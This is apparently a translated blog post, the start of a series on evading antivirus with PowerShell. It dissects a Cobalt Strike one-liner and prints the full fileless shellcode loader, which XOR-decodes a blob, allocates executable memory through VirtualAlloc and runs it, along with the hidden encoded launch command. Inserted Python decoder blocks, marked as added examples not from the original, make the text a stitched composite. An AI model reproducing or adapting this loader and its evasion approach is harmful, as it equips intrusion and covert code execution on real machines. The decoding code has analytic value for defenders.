
PowerShell AV evasion (dissecting the CS powershell command)

Preface

I spent a few days studying PowerShell AV evasion. Very few write-ups online actually analyze the payload by hand before evading it; most are reposts or rely on ready-made tools. So I decided to record the learning and analysis process and share it, partly to deepen my own understanding and partly to help anyone with the same need.

# Environment
CS 3.14 (the generated payload differs between 3.14 and 3.13)
Kali 2019
Windows 10

# AV products
Kaspersky (latest)
360 (latest)
VirusTotal (online static scanning)

# Language
PowerShell

The techniques involved are not deep; this is only a record of my own study of PowerShell AV evasion. The series will cover a PowerShell loader, loading shellcode from a remote host, bringing a host online to CS with a fileless PowerShell one-liner, and finally an automated PS client. PowerShell basics will not be repeated; where something needs to be understood along the way I will keep it as brief as possible.

Disclaimer: this content is for security enthusiasts to learn from. Do not use the techniques or tools described here for anything illegal; you alone bear the consequences.


Understanding the CS powershell command

Have CS generate the PowerShell command for bringing a host online.


Its content is as follows:

powershell -nop -w hidden -encodedcommand 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

This is CS's fileless way of getting a host online: PowerShell loads the shellcode straight into memory and executes it. Let's walk through the command piece by piece.

  • -nop => -NoProfile: do not load the PowerShell profile scripts
  • -w hidden => -WindowStyle Hidden: hide the console window
  • -encodedcommand => run the Base64 string that follows as the command; the Base64 wraps the UTF-16LE bytes of the script, not UTF-8, so decoding it with a plain Base64 decoder yields text interleaved with NUL bytes

Decode the string after -encodedcommand to see what this command actually does.


$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

The code shows that the string is first Base64-decoded and then gunzipped. The idea is simple: compression shrinks the payload and, as a side effect, obfuscates it. It is not encryption; anyone who can decode Base64 can unpack it.

  • [System.Convert]::FromBase64String: .NET method that turns a Base64 string back into a byte array
  • System.IO.Compression.GzipStream: .NET class that compresses/decompresses a stream

Here are two ways to recover the source script behind this Base64 blob.

  1. Decompress it with Python's gzip module
  2. Decompress it in PowerShell (recommended)
# PowerShell

# Base64-decode into a byte array, wrap it in a MemoryStream, rewind, then read it back through a GZipStream
$data = [System.Convert]::FromBase64String("CompressedBase64StreamHere")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null      # rewind to the start before decompressing
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
$sr.ReadToEnd()               # prints the decompressed script
# Python

import base64
import gzip

b64 = ""  # paste the Base64 string taken from FromBase64String("...") here
raw = base64.b64decode(b64)

# The decoded bytes are a raw gzip stream (1f 8b magic), not a zip archive,
# so decompress them with the gzip module instead of writing out a .zip file
print(gzip.decompress(raw).decode())
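Both snippets above deal only with the inner gzip layer and expect the Base64 text to be pasted in by hand. The Python below is an added example, not code from the original article or from Cobalt Strike: it also undoes the outer -encodedcommand layer (Base64 over the UTF-16LE bytes of the script), pulls the gzip blob out of the MemoryStream/GzipStream wrapper automatically, and refuses to gunzip a blob that lacks the gzip magic. The build_sample_command helper and its Write-Host script are constructed stand-ins so the example runs offline; they are not a real beacon command.

```python
import base64
import gzip
import re

# The gzip stage CS wraps around the real script:
#   $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("<b64>"));IEX (...GzipStream...)
GZIP_STAGE_RE = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")
# Any unambiguous prefix of -EncodedCommand is accepted by powershell.exe
ENC_ARG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+(\S+)", re.IGNORECASE)


def decode_encoded_command(arg: str) -> str:
    """Reverse the outer `-encodedcommand` layer.

    The argument is Base64 over the UTF-16LE bytes of the script (not UTF-8),
    which is why `base64 -d` on its own shows text interleaved with NUL bytes.
    """
    return base64.b64decode(arg).decode("utf-16-le")


def unwrap_gzip_stage(script: str) -> str:
    """Return the script hidden inside the MemoryStream/GzipStream wrapper.

    Scripts that do not carry the wrapper are returned unchanged.
    """
    m = GZIP_STAGE_RE.search(script)
    if m is None:
        return script
    blob = base64.b64decode(m.group(1))
    if blob[:2] != b"\x1f\x8b":  # gzip magic; anything else is not this stage
        raise ValueError("FromBase64String argument is not a gzip stream")
    return gzip.decompress(blob).decode("utf-8")


def decode_cs_powershell_command(cmdline: str) -> str:
    """Take the whole one-liner and return the script that IEX finally runs."""
    m = ENC_ARG_RE.search(cmdline)
    if m is None:
        raise ValueError("no -encodedcommand argument found")
    return unwrap_gzip_stage(decode_encoded_command(m.group(1)))


def build_sample_command(inner_script: str) -> str:
    """Constructed stand-in (not a real beacon): applies the same two layers CS does."""
    gz_b64 = base64.b64encode(gzip.compress(inner_script.encode("utf-8"))).decode()
    wrapper = (
        f'$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("{gz_b64}"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
        "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
    )
    enc = base64.b64encode(wrapper.encode("utf-16-le")).decode()
    return "powershell -nop -w hidden -encodedcommand " + enc


if __name__ == "__main__":
    sample = build_sample_command("Write-Host 'inner stage'")
    print(decode_cs_powershell_command(sample))
```

To use it on a real command, pass the full one-liner copied from CS to decode_cs_powershell_command; the string it returns is the loader script shown in the next section.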
# Final code

Set-StrictMode -Version 2

function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

If ([IntPtr]::size -eq 8) {
    [Byte[]]$var_code = [System.Convert]::FromBase64String('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')

    for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
    }

    $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
    $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

    $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
    $var_runme.Invoke([IntPtr]::Zero)
}

The code above is what the CS PowerShell one-liner ultimately executes. In short: $var_code receives the bytes read from the bin file[1], XORed with 35 and then Base64-encoded; the loop XORs each byte with 35 again to restore the original shellcode. VirtualAlloc (0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE) then allocates a readable, writable and executable buffer, Marshal::Copy writes the shellcode into it, and GetDelegateForFunctionPointer turns the buffer address into a callable delegate that is invoked to run the shellcode in memory. Two details worth noting: the outer `[IntPtr]::size -eq 8` check means this stager only runs inside a 64-bit PowerShell process, and func_get_proc_address resolves VirtualAlloc at runtime through the GetModuleHandle/GetProcAddress methods of the Microsoft.Win32.UnsafeNativeMethods type in System.dll, so the script never declares its own P/Invoke signatures with Add-Type.
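To work with the shellcode itself, for example to dump it the way footnote 1 does or to swap in a fresh one when modifying the loader later, it helps to pull it out of the stager without executing anything. The Python below is an added example, not code from the article or from Cobalt Strike: it reads the Base64 blob and the -bxor key out of the decoded script, reverses the XOR, and formats the bytes the way [System.BitConverter]::ToString does. SAMPLE_SHELLCODE holds only the first ten bytes of a typical x64 stager prologue and build_sample_stager is a constructed stand-in for the script above, both included so the example runs offline; looks_like_x64_shellcode is a heuristic, not proof that a blob is a beacon.

```python
import base64
import re

# Shellcode blob and XOR key as they appear in the stager:
#   [Byte[]]$var_code = [System.Convert]::FromBase64String('<b64>')
#   $var_code[$x] = $var_code[$x] -bxor 35
FROM_B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
XOR_KEY_RE = re.compile(r"-bxor\s+(0x[0-9a-fA-F]+|\d+)")


def extract_shellcode(stager: str) -> bytes:
    """Recover the raw shellcode from the decoded CS PowerShell stager.

    The script stores Base64(shellcode XOR key) and undoes the XOR in a loop;
    this performs the same two steps offline, reading the key from the script
    instead of assuming 35 so a regenerated stager with another key still works.
    """
    b64 = FROM_B64_RE.search(stager)
    if b64 is None:
        raise ValueError("no FromBase64String(...) payload in stager")
    key_m = XOR_KEY_RE.search(stager)
    key = int(key_m.group(1), 0) if key_m else 0  # no -bxor loop: bytes stored in the clear
    return bytes(b ^ key for b in base64.b64decode(b64.group(1)))


def to_bitconverter_hex(data: bytes) -> str:
    """Same layout as [System.BitConverter]::ToString($bytes): 'FC-48-83-...'."""
    return "-".join(f"{b:02X}" for b in data)


def looks_like_x64_shellcode(data: bytes) -> bool:
    """Heuristic: Metasploit/CS x64 stagers open with cld; and rsp,-16; call (fc 48 83 e4 f0 e8)."""
    return data.startswith(b"\xfc\x48\x83\xe4\xf0\xe8")


# Constructed sample: only the opening bytes of a typical x64 stager, not a working payload
SAMPLE_SHELLCODE = bytes.fromhex("fc4883e4f0e8c0000000")


def build_sample_stager(shellcode: bytes, key: int = 35) -> str:
    """Constructed stand-in for the CS script above, reduced to the lines the extractor reads."""
    b64 = base64.b64encode(bytes(b ^ key for b in shellcode)).decode()
    return (
        "If ([IntPtr]::size -eq 8) {\n"
        f"    [Byte[]]$var_code = [System.Convert]::FromBase64String('{b64}')\n"
        "    for ($x = 0; $x -lt $var_code.Count; $x++) {\n"
        f"        $var_code[$x] = $var_code[$x] -bxor {key}\n"
        "    }\n"
        "}\n"
    )


if __name__ == "__main__":
    sc = extract_shellcode(build_sample_stager(SAMPLE_SHELLCODE))
    print(to_bitconverter_hex(sc), looks_like_x64_shellcode(sc))
```

Feeding the real decoded stager to extract_shellcode gives back exactly the bytes of the bin file CS generated, which is a quick way to confirm that the loader's XOR step was understood correctly before changing it.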


Closing remarks

That completes the analysis of the CS payload. If all you want is the content behind the Base64 and compression, none of this is necessary: just have CS generate the PowerShell file directly. The reason for analyzing it this carefully is to make the evasion work that follows easier to carry out and modify.



  1. The bin file is raw binary; convert the byte array read from it to hex with [System.BitConverter]::ToString($bytesArray) and you will see it is simply the shellcode. ↩︎

Original article by s1ye. Reproduction without authorization is prohibited; to republish, contact the author: s1ye
